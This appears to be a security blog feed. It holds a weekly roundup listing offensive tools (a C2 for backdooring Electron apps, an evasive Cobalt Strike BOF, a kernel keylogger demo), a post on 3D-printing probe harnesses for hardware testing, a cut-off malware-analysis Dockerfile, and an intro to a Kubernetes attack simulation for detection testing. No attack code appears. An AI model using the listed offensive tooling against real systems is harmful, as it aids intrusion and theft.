Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2025-04-07 to 2025-04-14.

News

Techniques and Write-ups

Tools and Exploits

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

Last Week in Security (LWiS) - 2025-04-07

By:Erik
8 April 2025 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2025-03-24 to 2025-04-07.

News

Techniques and Write-ups

Tools and Exploits

  • Loki - πŸ§™β€β™‚οΈ Node JS C2 for backdooring vulnerable Electron applications.
  • GhidraMCP - MCP Server for Ghidra.
  • BloodHound-MCP-AI - BloodHound-MCP-AI is an integration that connects BloodHound with AI through the Model Context Protocol, allowing security professionals to analyze Active Directory attack paths using natural language instead of complex Cypher queries.
  • roadrecon_mcp_server - Claude MCP server to perform analysis on ROADrecon data.
  • sharefiltrator - Tool for enumeration & bulk download of sensitive files found in SharePoint environments.
  • PatchGuardEncryptorDriver - An improved version of PatchGuard that I implemented, which includes integrity checks and other protection mechanisms I added.
  • blackcat - BlackCat is a PowerShell module designed to validate the security of Microsoft Azure. It provides a set of functions to identify potential security holes.
  • AzureFunctionRedirector - Code and tutorial on using Azure Functions as your redirector. Careful, Microsoft has been known to close subscriptions if they detect nefarious use.
  • Inline-EA - Cobalt Strike BOF for evasive .NET assembly execution.
  • FrogPost - postMessage Security Testing Tool.
  • NativeNtdllRemap - Remap ntdll.dll using only NTAPI functions with a suspended process.
  • NativeTokenImpersonate - Impersonate Tokens using only NTAPI functions.
  • KeyJumper - This project demonstrates arbitrary kernel code execution on a Windows 11 system with kCET enabled, to create a keylogging tool by mapping kernel memory to userland. You can find a blogpost about it here for more information.

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

3D Printing Flying Probe Test Harnesses: Can you?

By:Sam
25 April 2025 at 17:51

Introduction

While testing a client's device, I found it included a castellated board with non-standard-pitch castellations. I had a lot of trouble probing the castellated component with SensePeek PCBites and other styles of probes.

Printed Circuit Board with Castellated Edges

Whether the probes fell over hours after being set, or were bumped out of place while setting a subsequent probe (ultimately shorting a voltage regulator and bricking a device), I became desperate for a better solution. Out of this frustration, I started tinkering with designing an assembly to hold the PCBites in place, before remembering my stash of pogo pins and sleeves and instead designing a harness to hold pogo pins at the non-standard pitch of the target. While the test ended successfully before that assembly was needed, the idea stuck all the same.

What Are Probes (I’ll Keep This Brief).

Electronics are commonly tested at time of manufacture using a process called Flying Probe Testing. The probes used for these tests are manufactured in a variety of formats, but generally consist of a sleeve and a spring-loaded pin. In automated testing, these probes allow for some wiggle room in clearance when moving to contact circuit boards or components which might have varying dimensions.

Flying Test Probes

While quite well suited to their intended purpose, spring-loaded test probes, or "pogo pins," have also seen an increase in popularity over the last couple of decades. Uses range from small-run console modchips to charging station contacts to handheld testing probes. As implementations like these have hit the scene, they have spurred a lot of innovation.


Why would we want to make our own?

The use case of interest for this project is the assembly of target-specific probe harnesses. While tools like sockets exist for various formats of components, such as flash chips or MCUs, the practice of designing custom System-on-Module (SoM) boards with castellated edges for mounting and connection to the main board has become more common, and there is generally no common socket for these types of boards.

In some cases, when such boards feature a common pitch such as 2.54mm, it is possible to assemble sockets to suit them using special components such as Solder Party's FlexyPin.

Castellated Board Mounted with FlexyPins

However, hardware designers do not always use standard pitch for board-to-board connections, even when using otherwise standard footprints for castellations.

Non-Standard Pitch or Depth Castellations

When encountering these patterns of design in hardware assessments, existing solutions such as PCBite or generic air-nozzle-based third-hand devices become cumbersome and self-defeating. With each probe added, the chance of knocking an already-placed probe over increases, which can (and has) resulted in shorting components and bricking a test target. Obviously, this is something we want to avoid when performing testing, especially on a client's dime and time.

For cases such as these, the appeal of designing a probe harness is significant; however, acquiring such a harness is very likely impossible. Even when clients can provide engineering or debug builds of products, it is very uncommon for their manufacturing contract to include providing one of the manufacturer's own flying probe assemblies, and even less likely that the assembly would be designed to contact all traces from a given major component in the first place.

The advent of affordable 3D printers raises the question of whether it is possible to design and manufacture test probe harnesses for uncommon targets in-house. In this post we will go through some approaches taken to try to answer this question, including what did not work and what might work better next time.

SLA vs. FDM and the Expected Challenges of the Latter

While SLA (Stereolithography Apparatus) printers seem quite well suited to this purpose, they are also expensive to operate and messy. I personally do not own an SLA printer for these reasons, and order out for resin prints when I want them. That, however, usually takes weeks! FDM (Fused Deposition Modeling) printers are cheap, widely available, and the materials they consume are also quite affordable.

Despite these advantages, FDM printers come saddled with several disadvantages for this purpose. Most likely you will be printing with a .4mm nozzle, which introduces challenges in slicing. FDM printers struggle to make corners without loss of dimensional accuracy due to expansion and shrinking of the printed material, especially given the motions the printer makes to produce a corner. Similarly, the printer must have its flow, extruder steps, x/y skew, and print speed tuned in order to achieve dimensional accuracy.


Some of these disadvantages must be worked around, while others are more a function of how well your printer is tuned and maintained. Ordering such a part from an FDM shop may result in better or worse accuracy than you can achieve on your own with a little tuning, and if you are 3D printing already, you have likely already taken steps to tune your printer.

By leaning on lessons learned from general 3D printing, the speed and accessibility of FDM printers can be preserved by designing for the strengths of FDM printing rather than languishing in, or attempting to design around, its weaknesses. Care taken in tuning wall thicknesses, layer heights, flow, extrusion, thermal expansion offsets, mesh bed leveling, vibration compensation, and other features and settings can mitigate or even eliminate many of the disadvantages of FDM printing in our use case. That said, care must still be taken in the design of the model itself to ensure the strengths of the printer are exploited while its weaknesses, such as the inability to print accurate corners, are avoided or eliminated altogether.

Plan of Attack

In order to determine the efficacy of this approach, I brainstormed a few different harness styles and chose the ones I thought would be most achievable at the outset. After developing a plan for harness styles, I gathered documentation and materials relating to the target device as well as the pins and sleeves I had on hand. Once materials were gathered, I rapidly printed and tested several design styles and documented what did and did not work with each, including those ever-anticipated, unforeseen issues so commonly encountered when printing.

Preparation / Setup

Equipment, Tools, and Software I Used

CAD - Autodesk Fusion 360

For the design facets of this project I used Fusion, but any 3D modeling software you are comfortable with would be just fine! I have successfully used tools ranging from Tinkercad to Blender to Fusion to produce models for 3D printing; it all comes down to what works for you and whether it facilitates precise dimensions in your designs.

Slicer - Cura

I chose Cura for slicing models for this project because I am most familiar with the nomenclature of its settings, which are crucial in this project for achieving dimensional accuracy. Again, this is not a requirement for your own purposes; any slicing software which allows you to achieve high dimensional accuracy would be fine.

Print Controller - Octoprint + Obico

I still use Octoprint because I find its plugin approach the easiest to work with in order to implement my enclosures' sensors and relay controls. In addition to various sensors monitored directly by the printer mainboard and Octoprint via Raspberry Pi GPIOs, Obico is also used to monitor the print job from various cameras and automatically detect failures. It is important to note that modern printers have directly implemented many of these features and more.

Printer - Creality "Ender 3 Pro" (kind of)

The printer used for this project was originally an Ender 3 Pro, but it has undergone enough modifications since 2014 that it is easy to question how much of the original printer remains. In its current state, it is a dual-Z-axis FDM printer configured for Bowden extrusion with a high-temperature hotend and automated bed leveling. For comparison, an untuned Bambu Lab A1 Mini was also used to print some of the prepared models.

Pins and Sleeves - R-50 Sleeves and P-50-B Pogo Pins


Which Target to Design For

In lieu of any customer's device (I cannot violate NDAs, no matter how cool), I needed to select a device with a similar pattern of castellations. I had a few in mind, but decided to explore a couple of options in case my first idea did not work out (it did not, after all).

ESP32 SoM


Having used various patterns of ESP32 development boards dozens if not hundreds of times, I thought first of these devices as a facsimile of the original target which inspired this project. These devices include a castellated ESP32 SoM with sub-1.27mm pitch, which is too small to easily achieve a working probe, as even the internal pogo pin sleeves are too wide to align side by side.

Some efforts were made to achieve a design for this using a sort of X or criss-cross pattern of alignment for the pins; however, this seemed too cumbersome to pursue first. This remains a desirable target due to the immense ubiquity of the common-pattern ESP32 SoM in consumer products such as the Hatch alarm clock pictured above, as well as in commercial and industrial products alike.

That said, you will occasionally find more uncommon patterns for ESP32 SoM boards, such as in Sainsmart weather meters, as pictured below.

Uncommon Pattern ESP32 SoM

WaveShare ESP32-S3 Zero

WaveShare ESP32-S3 Zero

WaveShare produces a lot of products. Most of the time when I encounter one of their products implemented in something else, it is a display; I have not yet encountered a WaveShare castellated ESP32-S3 SoM in the wild. With all that said, the 2.54mm pitch makes it an easy target for demonstration; however, it is extremely uncommon compared to the pattern found on WROOM/WROVER/everything-with-wifi+bluetooth-you-crack-open.

An advantage of targeting this pattern worth mentioning is the lack of a third row of pins to probe. This type of pattern would be an ideal target for a clamp-style probe harness.

WaveShare RP2040 Zero

WaveShare RP2040 Zero

Sporting almost the exact same pattern as their ESP32-S3 Zero board, WaveShare's castellated RP2040 board also uses a 2.54mm pitch. Though I have not yet seen this pattern (or any RP2040) in a product in the wild, this specific model seems to be a fairly popular pattern for the RP2040 among maker types, based on casual searching.

For the purposes of this project, we selected this board as our target. Note that the target itself is not what is important here, but rather whether or not this approach is viable for use in real-world scenarios.

Designs

Wasted PLA

During the brainstorming phase I came up with several ideas for what styles of harness might enjoy the advantages of FDM printing more than grate against its weaknesses, coupling those constraints with the presumption that the simpler the design of the model itself, the better. This resulted in setting aside designs which involved torsion springs and other mechanisms, such as clamps. It also precluded, at the outset, the use of compliant mechanisms, which would likely be a solution worth pursuing for one of the caveats encountered during this project.

Ultimately, I decided to pursue a simple Block-with-Holes design, as this seemed to be the simplest design possible. As discussed later, however, this design introduced challenges which I had not anticipated. In light of those challenges, I ended up abandoning the block design in favor of another option, a Block-and-Compression-Ring, midway through the project.

Box-with-Holes

Partially Assembled Probe Harness

Designing for the target

Where to point the pins

If your target has footprints available, lucky you! You could import those into your CAD software and use them to trace the outlines of your model and take Easy Street to your destination.


If your target does not have a footprint, because it is not a consumer product but just some weird thing you found inside the plastic and maybe they drew the pads by hand, then you will need to turn left and take The Hard Way.


Little things

We can take advantage of the play afforded by the spring-loaded pogo pins to design a harness which will have some amount of grip on the target board. To do this, we can angle the slots for the pins inward at the bottom by a few degrees. In this case I chose 92 degrees as the angle for the pin slots, which I intended to leave all of the pins slightly compressed by friction against the vertical edge of the castellations.

Angling Pinholes

Here I thought I was being quite clever in attempting to design the model such that the slicer would create discrete circles for the holes in the model. My thinking was that by slicing the holes as discrete, individual circles, the best dimensional accuracy could be achieved, resulting in the ability to print a model which would accept the R-50 sleeves in a friction fit. Techniques otherwise viable for achieving friction fits in 3D prints, such as expansion channels or lining the bore with flexible fins, were not possible here due to the constraint of the .4mm nozzle size.


I initially used a .88mm hole to afford a very small clearance for the ~.86mm width of the R-50 sleeve and included a 1mm counterbore, which I had hoped would leverage the ridge on the end of the sleeve to increase friction for the fit.

Designing the Counter Bore
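
For reference, the basic geometry is simple to express in code. The following is a rough sketch (not the Fusion 360 model used in this project) written with the CadQuery Python library: a single 2.54mm-pitch row of 0.88mm through-holes with 1mm counterbores in a small block. The 2-degree inward tilt described above is omitted, and the pin count and block dimensions are assumptions.

  import cadquery as cq

  PITCH = 2.54     # mm, pin-to-pin spacing
  HOLE_D = 0.88    # mm, clearance hole for the ~0.86mm R-50 sleeve
  CBORE_D = 1.0    # mm, counterbore for the ridge at the end of the sleeve
  N_PINS = 9       # assumed number of pins in the row

  block = (
      cq.Workplane("XY")
      .box(N_PINS * PITCH + 4, 8, 6)       # simple rectangular block
      .faces(">Z").workplane()
      .rarray(PITCH, 1, N_PINS, 1)         # one row of hole centers at 2.54mm pitch
      .cboreHole(HOLE_D, CBORE_D, 1.0)     # through-hole with a 1mm-deep counterbore
  )

  cq.exporters.export(block, "probe_block.stl")  # mesh for the slicer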

Immediately, the first major unforeseen caveat became apparent.

Top View of Diminishing Hole Size Along Rows

Attempting to print this model with an untuned Bambu Lab A1 Mini did not yield better results.

Holes Near Completely Sealed

All of my clever forethought about ensuring the circles laid down for the pin holes were discrete was for naught. It created an issue wherein the constant hopping and retraction while printing the circles caused a buildup at the nozzle which overpowered the static thermal expansion compensation. Thinking that it would be easier to just jam a .9mm needle through the holes to widen them, rather than manually edit the G-code for the print to increase the flow compensation along each row of holes, I carried on.
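
For the curious, the G-code edit I skipped could be roughly automated. The sketch below is an assumption of how it might be done, not something used in this project: it post-processes the sliced file and bumps Marlin's flow percentage (M221) whenever the toolhead's X position falls within the band containing the row of holes. The band limits and the 8% bump are made-up values.

  import re

  X_MIN, X_MAX = 100.0, 130.0                 # assumed X extent of the hole row, mm
  BUMP, NORMAL = "M221 S108", "M221 S100"     # flow override / back to normal

  out, boosted = [], False
  with open("probe_block.gcode") as f:
      for line in f:
          m = re.match(r"G1 .*X([-\d.]+)", line)
          if m:
              inside = X_MIN <= float(m.group(1)) <= X_MAX
              if inside != boosted:
                  out.append((BUMP if inside else NORMAL) + "\n")
                  boosted = inside
          out.append(line)

  with open("probe_block_flow.gcode", "w") as f:
      f.writelines(out)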

It soon became clear that this approach was not good for rapidly producing a usable harness. Even for the holes which seemed to have the best dimensional accuracy, it still required applying pressure to a delicate brass or copper sleeve, and attempts to assemble this version resulted in the loss of many good sleeves in crush accidents. Still, some holes were too wide and others too narrow, which seemed like too much delicate effort for something that was intended to be easier, faster, and cheaper than existing solutions. It was getting dark, and I was starting to run out of pre-soldered sleeves.


At this point I tested increasing the width of the holes at the ends where they were becoming too narrow, and considered using a material like thread or magnet wire to shim the holes to achieve the friction fit I intended. Seeing no success in adjusting the hole diameters, or in adding additional holes in the hope that the effect would be pushed out to them instead, I decided to pivot to a different design.

First Layers of Box versus Compression Ring Designs

Compression Ring

I did not want to give up on printing a model which achieved a friction fit without a third material to shim. The second of the two designs seemed more complicated in that it would be two pieces, which risked issues with clearances and fits. Despite that caveat, the two-piece design also afforded more flexibility in the friction applied to the pins, or so I had hoped.


Design changes

Using the previous model as a starting point, I divided the model along the center axes of the rows of holes and increased the spacing of the edge faces between each of the former holes to create more U-shaped channels. I also added dowels at 90 degrees to the interior corners where the two pieces combine, in order to provide a constant friction not afforded by the +2 degree angle of the channeled faces. A clear advantage of the compression-ring style is that it is sliced as almost entirely unbroken lines, resulting in a significantly faster print. While the block-and-hole style harnesses were taking 40-50 minutes to complete, the compression ring design only took about 17 minutes.


After several iterations of this model, including attempting to add studs and bars to the interior of the compression ring at each pin, I found myself back to considering using glue, or some kind of shim material, to achieve a snug fit for each sleeve inside the model.


While I was impressed with the level of dimensional accuracy I was able to achieve with a .4mm nozzle and a decade-old FDM printer-of-Theseus, sub-millimeter features seem to be very difficult to print successfully.


Well At Least We Learned Something

Using some simple glue, I went ahead and assembled a full model and performed a basic test, flashing the RP2040 and making it blink using the harness and a [????] programmer.


While there were a few setbacks before reaching this point, none were so severe as to deter me from considering this approach in the future. The capability to design and manufacture bespoke probe harnesses to drop a single assembly into a target and probe all exposed interfaces in-situ within the span of a day or two is still highly appealing, even if it means using a little glue.

Conclusions

FDM printers require a lot of tuning to get close to decent dimensional accuracy. If the pitch of your target is too narrow, it will be difficult or even impossible to achieve a design which can be printed without using a staggered, criss-crossing approach, which further increases the complexity of the print. An SLA printer is going to outperform an FDM printer for these purposes, but SLA printers are not nearly as approachable as FDM printers.

While this seems challenging, I am excited to explore possible options to achieve this going forward. One good option is designing for bare pogo pins and shimming them in place with the lead wire, as demonstrated below. Another approach might be to abandon pogo pins altogether and opt instead for solid-core copper wire, which may allow clean prints for smaller-pitched targets.

Despite these caveats, and those which come along with attempting to FDM print any object, this still seems a viable method for designing probes, even if a third material such as glue or shims is needed for a snug assembly.

With some lessons learned, particularly about how better to design the channels or holes for pins, I wanted to demonstrate the efficacy of FDM printers for rapidly developing test harnesses. To do this, I grabbed a D-Link router from the To-Hack pile, cracked it open and located an unpopulated interface. Within about one hour, including print and assembly time, I was able to prepare, apply, and use the harness.


If you want to give these models a try yourself, copies of the .obj files are available on Sam's GitHub.

Looking Forward

Some caveats for this style of probe harness might be overcome by using a narrower nozzle, such as .2mm, which I believe is worth exploring in the future.

In addition to this single-block style of probe harness, I think there is also value in the use of FDM printers to produce clamp style probes for common formats like SOIC8, as well as Electronics Acupuncture Probe (EAP) assemblies, which I look forward to experimenting with soon.

reverse engineering malware in a container - part 1

17 April 2025 at 19:02
part of the attack sim from the last post was an eBPF module that provided extended kernel-level monitoring and interference with processes. i thought it would be fun to reverse engineer it in a restricted environment, like a docker container.

container

the Dockerfile for the container is loaded with analysis tools.

  FROM ubuntu:20.04

  # avoid interactive prompts during installation
  ENV DEBIAN_FRONTEND=noninteractive
  ENV TZ=Etc/UTC

  # install essential tools for binary analysis
  RUN apt-get update && apt-get install -y \
      binutils \
      file \
      strace \
      ltrace \
      gdb \
      radare2 \
      python3 \
      python3-pip \
      python3-venv \
      bsdutils \
      xxd \
      build-essential \
      procps \
      elfutils \
      libcapstone-dev \
      curl \
      wget \
      unzip \
      git \
      nano \
      vim \
      tcpdump \
      tshark \
      iputils-ping \
      net-tools \
      sudo \
      golang \
      binutils-dev \
      libbfd-dev \
      libz-dev \
      python3-dev \
      default-jre-headless \
      cmake \
      # add these eBPF analysis tools
      bpfcc-tools \
      linux-headers-generic \
      linux-tools-generic \
      bpftrace \
      util-linux \
      # add dependencies for building bpftool
      libelf-dev \
      # install bsdmainutils for hexdump
      bsdmainutils \
      && apt-get clean && rm -rf /var/lib/apt/lists/*

  # install bpftool (if not included in linux-tools)
  RUN git clone --recurse-submodules https://github.

clusterfuck: attack sims on k8s clusters

9 April 2025 at 18:37
tl;dr clusterfuck is a multi-stage attack simulation against k8s environments. it executes privilege escalation, container escape, credential theft, lateral movement, and crypto mining techniques. it's designed to validate detection capabilities in your cloud security posture management (CSPM) and endpoint detection and response (EDR) tools. when successful, it triggers 20+ high-severity security alerts across the attack chain, helping security teams test their defenses, improve detection coverage, and practice incident response.